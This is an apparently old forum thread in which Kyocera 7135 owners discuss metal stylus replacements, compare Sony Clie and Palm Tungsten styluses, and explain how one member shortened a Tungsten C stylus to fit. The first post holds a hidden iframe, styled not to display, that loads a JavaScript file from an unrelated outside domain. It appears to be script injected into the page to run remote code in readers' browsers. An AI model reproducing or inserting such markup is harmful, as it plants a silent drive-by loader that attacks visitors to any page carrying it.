+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

Poss metal stylus for 7135?

I saw this at Circuit City and thought about buying it. Because it is collapsable it looks like it might fit the 7135. Has anyone else seen these and know if they will fit or not? They are metal with a rubber tip and are longer than the plastic one that came with the 7135. I am thinking that when you insert it into the phone it can collapse enough to fit snugly. Let me know what you think. I am curious because if these fit it will offer a solution other than modifying other brands of metal styli.
    http://www.sonystyle.com/is-bin/INTE...wAAAD4r_R1X0az<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

bad link

This link did not lead to the stylus. Can you get a part number?

part number: PEGA-ST50

Anyone know if this works with the 7135, looks like a good design. I am just ready to replace the plastic stylus....I hate it.
    PDAPanache was the brand of stylus I used on my other palms, but they are not able to support the 7135......

It's probobly for the Palm Tungston. A friend of mine has one. The length, with the spring loaded top is about the same size as the one for the 7135, however I think the barrel diameter is thicker. -

sci
    Ok friends, here's the scoop. As stated the Tungsten T stylus is to thick and will not fit in the stylus silo on the '35. The telescoping stylus first mentioned in this thread is for the Clie UX-50 and similar models. That stylus is actually a little to thin and after using it a little when checking out a UX-50 I would avoid it at all costs. It feels like a toothpick with more flex, for that reason alone I would never consider a UX-50.

The solution I came up with to get a more substantial stylus was to modify a Tungsten C stylus. It has a heavier feel and I find I write much more accurately with it.
    Attached Thumbnails Attached Thumbnails Poss metal stylus for 7135?-stylus.jpg  

Originally posted by adamsbrian74
    PDAPanache was the brand of stylus I used on my other palms, but they are not able to support the 7135......
    Why is that? I'm completey at a loss to understand why none of the 3rd party stylus manufacturers have not supported the 7135. It wouldn't be all that difficult.
    Dave

Originally posted by dwdod
    Why is that? I'm completey at a loss to understand why none of the 3rd party stylus manufacturers have not supported the 7135. It wouldn't be all that difficult.
    Here is the original reply I received from them....

Hello,

Thank you for contacting us.

We regret we do not currently support your Kyocera 7135 phone with a
    custom stylus.

We do appreciate the suggestion, and we will consider stylus support as
    we continue to improve our products and service.

Please let us know if we may be of any additional assistance at all.

Best regards,

PDA Panache Corp.
    - Your Stylus Source Since 1993 -

<http://www.pdapanache.com/>

I sent them an email in September as well......just going to bug them till they get serious about this product.

Please feel free to email them as well.....the greasy wheel gets the oil.

Originally posted by dwdod
    Can you say "volume"?. Its easy as an owner and member of this forum to think that half the world has one. It just ain't so. They will make a model for low volume devices if its a very slight (low cost) mod to an existing model. I suspect the form factor for the 7135 would require a design and manufacture from the ground up.

-Quick

Originally posted by Quick
    Can you say "volume"?. Its easy as an owner and member of this forum to think that half the world has one. It just ain't so. They will make a model for low volume devices if its a very slight (low cost) mod to an existing model. I suspect the form factor for the 7135 would require a design and manufacture from the ground up.

-Quick
    Point taken, but there are enough users of the 7125 to warrant a stylus (I am not saying they need to mass produce a million of these, but you'd think they would come up with some trim cut of another design and put 1000 or so up for orders and see where that takes them). The manufacturing behind a stylus is not that difficult. Most of these companies come out with new models on new devices instantly. The 7135 is a smaller design, but no more difficult than anything else out there.

I am just venting, as I hate the plastic stylus, don't own a lathe, and have no re-tapping tools, so for me a 3rd party design would be sweet. Especially if it was a smaller version of the black nail I had from PDAPanache for my old Handspring Visor Deluxe.....now that was a solid feeling, good looking stylus.

Fingers are crossed here........

update to my response above - 7135 not 7125 (it's late.....)

. Especially if it was a smaller version of the black nail I had from PDAPanache for my old Handspring Visor Deluxe.....now that was a solid feeling, good looking stylus.
    You and me both. I had one in black and one in chrome for my Vx.
    -Quick

PJH
    I agree that it's too bad PDAPanache is not producing one of their great styluses for the 7135. I actually have ended up using their stylus from my broken HP Jornada 568. The stylus thickness is a perfect fit for the 7135. The length is about 1/2 inch too long, but that's less than the antenna sticks out, plus it allows for an easy grasping of the stylus without having to fumble for the fully inserted plastic one. The weight, feel, and light pressure needed for writing are other reasons for putting up with the extra length.

Fingers are crossed here........
    You might as well uncross your fingers. If it hasn't happened by now, it ain't gonna happen!
    Dave

Originally posted by sci
    Ok friends, here's the scoop. As stated the Tungsten T stylus is to thick and will not fit in the stylus silo on the '35. The telescoping stylus first mentioned in this thread is for the Clie UX-50 and similar models. That stylus is actually a little to thin and after using it a little when checking out a UX-50 I would avoid it at all costs. It feels like a toothpick with more flex, for that reason alone I would never consider a UX-50.

The solution I came up with to get a more substantial stylus was to modify a Tungsten C stylus. It has a heavier feel and I find I write much more accurately with it.
    How well does that fit? Is it very tight?

sci
    On the end cap of the tungsten C stylus there are two little raised dot's that lock the stylus in the C. I adjusted the lenght of the metal section of the stylus so those two "nubbies" catch withing the '35's silo. It actually locks in a little tighter than the standard stylus but It's not a bother for me. I do much prefer the stiffer heavier stylus, and since buying a pack of 3 Tungsten C styli was only 7 bucks I figured it was worth a try.

I attached a pic of the modified stylus in the 7135 but I suck a close up pictures.
    Attached Thumbnails Attached Thumbnails Poss metal stylus for 7135?-stylus2.jpg  

Photo looks good!... Pardon the non-technical person question, but how did you modify the nubbins and barrel length? I have no great selection of tools and would be happy to know if I can do this or just have to sit back and be jealous.
    Here, have a clue. No, take two, they're small.....

sci
    At the end of the day when I get home I'll post a pic or two that shows in better detail what I did to modify the stylus. I only used two tools, a hacksaw and a dremmel.. a little epoxy is also useful.

Originally posted by sci
    At the end of the day when I get home I'll post a pic or two that shows in better detail what I did to modify the stylus. I only used two tools, a hacksaw and a dremmel.. a little epoxy is also useful.
    You need to go into business to assist those of us who are all thumbs!
    Dave

sci
    " SCI'S STYLI "

I can see it now.... just what I need, one more thing to take time away from my wife and kid, and I though I got yelled at enough.. :wink